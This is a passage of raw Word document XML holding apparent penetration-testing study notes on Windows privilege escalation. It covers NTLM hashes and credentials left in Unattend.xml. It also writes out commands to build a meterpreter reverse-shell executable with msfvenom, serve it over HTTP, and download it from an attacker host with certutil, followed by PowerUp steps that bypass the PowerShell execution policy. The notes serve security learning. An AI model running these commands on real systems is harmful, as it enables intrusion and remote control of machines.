    <w:p w14:paraId="3D82E472" w14:textId="46E7FF5B" w:rsidR="005A3677" w:rsidRDefault="005A3677" w:rsidP="005A3677">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425051EF" w14:textId="558A3656" w:rsidR="00724FF6" w:rsidRDefault="00724FF6" w:rsidP="00724FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NTLM is a collection of authentication protocols that are utilized in Windows to facilitate authentication between computers. The authentication process involves using a valid username and password to authenticate successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD731B" w14:textId="401081D5" w:rsidR="00724FF6" w:rsidRDefault="00724FF6" w:rsidP="00724FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>From Windows Vista onwards, Windows disables LM hashing and utilizes NTLM hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59701F89" w14:textId="69D7E4D6" w:rsidR="00724FF6" w:rsidRDefault="00724FF6" w:rsidP="00724FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>When a user account is created, it is encrypte</w:t>
      </w:r>
      <w:r w:rsidR="004A10D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>d using the MD4 hashing algorithm, while the original password is disposed of.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD2A8A" w14:textId="4E8768BC" w:rsidR="004A10D2" w:rsidRDefault="004A10D2" w:rsidP="00724FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NTLM improves upon LM in the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE144C3" w14:textId="3CF05FD7" w:rsidR="004A10D2" w:rsidRDefault="004A10D2" w:rsidP="004A10D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Does not split the hash into two chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207AC5A" w14:textId="771D35F1" w:rsidR="004A10D2" w:rsidRDefault="004A10D2" w:rsidP="004A10D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Case sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EBBD72" w14:textId="337F40D7" w:rsidR="004A10D2" w:rsidRDefault="004A10D2" w:rsidP="004A10D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Allows the use of symbols and Unicode characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1454D8FF" w14:textId="77777777" w:rsidR="000553BD" w:rsidRDefault="000553BD" w:rsidP="000553BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5E7D9B" w14:textId="3B2BB55E" w:rsidR="000553BD" w:rsidRDefault="000553BD" w:rsidP="000553BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000553BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D9A334" wp14:editId="70C8CC5A">
            <wp:extent cx="5943600" cy="2216785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14366970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7061" name="Picture 1" descr="A diagram of a network&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2216785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85CB84" w14:textId="77777777" w:rsidR="00B925DF" w:rsidRDefault="00B925DF" w:rsidP="00B925DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Searching For Passwords in Windows Config Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD30D8" w14:textId="77777777" w:rsidR="00B925DF" w:rsidRDefault="00B925DF" w:rsidP="00B925DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A7702F" w14:textId="106F7C1B" w:rsidR="00B925DF" w:rsidRDefault="00B925DF" w:rsidP="00B925DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows can automate a variety of repetitive tasks, such as the mass rollout or installation of Windows on many systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D00BB" w14:textId="57353710" w:rsidR="00B925DF" w:rsidRDefault="00B925DF" w:rsidP="00B925DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This is typically done </w:t>
      </w:r>
      <w:r w:rsidR="00AD663F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Unattended Windows Setup utility, which is used to automate the mass installation/deployment of Windows on systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE2455" w14:textId="1164E717" w:rsidR="00B925DF" w:rsidRDefault="00B925DF" w:rsidP="00B925DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This tool utilizes configuration files that c</w:t>
      </w:r>
      <w:r w:rsidR="00AD663F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ontain specific configurations and user account credentials, specifically the Administrator account’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A3A3C" w14:textId="3593909D" w:rsidR="00AD663F" w:rsidRPr="00B925DF" w:rsidRDefault="00AD663F" w:rsidP="00B925DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If the Unattended Windows Setup configuration files are left on the target system after installation, they can reveal user account credentials that can be used by attackers to authenticate with the Windows target legitimately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2435C3" w14:textId="77777777" w:rsidR="00B925DF" w:rsidRDefault="00B925DF" w:rsidP="000553BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235BEDDB" w14:textId="10062A3C" w:rsidR="00815D6F" w:rsidRDefault="00815D6F" w:rsidP="000553BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unattended Windows Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0CD0D" w14:textId="48EAC7A9" w:rsidR="00815D6F" w:rsidRDefault="00815D6F" w:rsidP="00815D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Unattended Windows Setup utility will typically utilize one of the following configuration files that contain user account and system configuration information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FB433" w14:textId="159B576C" w:rsidR="00815D6F" w:rsidRDefault="00815D6F" w:rsidP="00815D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C:\Windows\</w:t>
      </w:r>
      <w:r w:rsidR="00554427">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Panther\Unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E393738" w14:textId="42101E95" w:rsidR="00554427" w:rsidRDefault="00554427" w:rsidP="00815D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C:\Windows\Panther\Autounattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56218684" w14:textId="11FAB669" w:rsidR="00554427" w:rsidRDefault="00554427" w:rsidP="00554427">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>As a security precaution, the passwords stored in the Unattended Windows Setup configuration file may be encoded in base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372A8D60" w14:textId="77777777" w:rsidR="006515FE" w:rsidRDefault="006515FE" w:rsidP="006515FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427C1539" w14:textId="505CFB27" w:rsidR="006515FE" w:rsidRDefault="006515FE" w:rsidP="006515FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>On Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5EE06" w14:textId="542C65C6" w:rsidR="006515FE" w:rsidRDefault="006515FE" w:rsidP="006515FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“net user” “whoami /priv” (CMD, check privs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749ADCE7" w14:textId="3854122C" w:rsidR="00F84927" w:rsidRDefault="00F84927" w:rsidP="006515FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>After attacking machine stuff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5EF29" w14:textId="6DA09AFD" w:rsidR="00F84927" w:rsidRDefault="00F84927" w:rsidP="00F84927">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“certutil -urlcache -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="007F69D1" w:rsidRPr="00A45190">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://(KALI)/payload.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B74B088" w14:textId="3E791BDF" w:rsidR="007F69D1" w:rsidRDefault="007F69D1" w:rsidP="007F69D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This should download the file, need to research more into it though.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041451BC" w14:textId="77777777" w:rsidR="006515FE" w:rsidRDefault="006515FE" w:rsidP="006515FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3086A60D" w14:textId="58516A42" w:rsidR="006515FE" w:rsidRDefault="006515FE" w:rsidP="006515FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>On Attacking Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F45D416" w14:textId="70D4DD78" w:rsidR="006515FE" w:rsidRDefault="00FA513A" w:rsidP="006515FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“m</w:t>
      </w:r>
      <w:r w:rsidR="006515FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sfvenom -p windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=(LHOST) LPORT=(LPORT)</w:t>
      </w:r>
      <w:r w:rsidR="00FE1477">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f exe &gt; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38962EC8" w14:textId="308AA4B4" w:rsidR="007A3BF3" w:rsidRDefault="007A3BF3" w:rsidP="007A3BF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Set up a python server to transfer the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35133C83" w14:textId="4610C61C" w:rsidR="007A3BF3" w:rsidRDefault="007A3BF3" w:rsidP="007A3BF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“python -m SimpleHTTPServer</w:t>
      </w:r>
      <w:r w:rsidR="00235AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19909D8C" w14:textId="585F9F83" w:rsidR="00235AD1" w:rsidRDefault="00E23EF9" w:rsidP="00235AD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(WILL NEED TO EXPLOIT THIS BEFOREHAND, THIS EXAMPLE IS JUST FOR THE DEMO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE604BC" w14:textId="1E7FA7F3" w:rsidR="00EB2D50" w:rsidRDefault="00EB2D50" w:rsidP="00EB2D50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Utilize the multi/handler Metasploit module and set the payload, LPORT, and LHOST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A48F6" w14:textId="77777777" w:rsidR="007F69D1" w:rsidRDefault="007F69D1" w:rsidP="007F69D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB68891" w14:textId="77A64FF7" w:rsidR="007F69D1" w:rsidRDefault="00C63B34" w:rsidP="007F69D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23EEDD" w14:textId="77777777" w:rsidR="007F69D1" w:rsidRDefault="007F69D1" w:rsidP="007F69D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7E17FC" w14:textId="5095DC9E" w:rsidR="007F69D1" w:rsidRDefault="00C63B34" w:rsidP="00C63B34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“cd .\Desktop”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7246A823" w14:textId="22C9885E" w:rsidR="00C63B34" w:rsidRDefault="000D63C8" w:rsidP="00C63B34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“c</w:t>
      </w:r>
      <w:r w:rsidR="00C63B34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>d .\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PowerSploit\Privesc” – Access powersploit(?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04318D78" w14:textId="3474E2D5" w:rsidR="00EE43E3" w:rsidRDefault="007534AE" w:rsidP="00C63B34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“powershell -ep bypass”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8413D" w14:textId="1DEFD8D9" w:rsidR="007534AE" w:rsidRDefault="007534AE" w:rsidP="007534AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Bypass Powershell execution policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD50A67" w14:textId="5F6B0375" w:rsidR="007534AE" w:rsidRDefault="007534AE" w:rsidP="007534AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“. .\PowerUp.ps1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DD45A" w14:textId="7CC1F3BB" w:rsidR="00D33E9E" w:rsidRDefault="00D33E9E" w:rsidP="00D33E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Importing PowerUp script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BFFF08" w14:textId="70C9F78F" w:rsidR="007534AE" w:rsidRDefault="007534AE" w:rsidP="007534AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
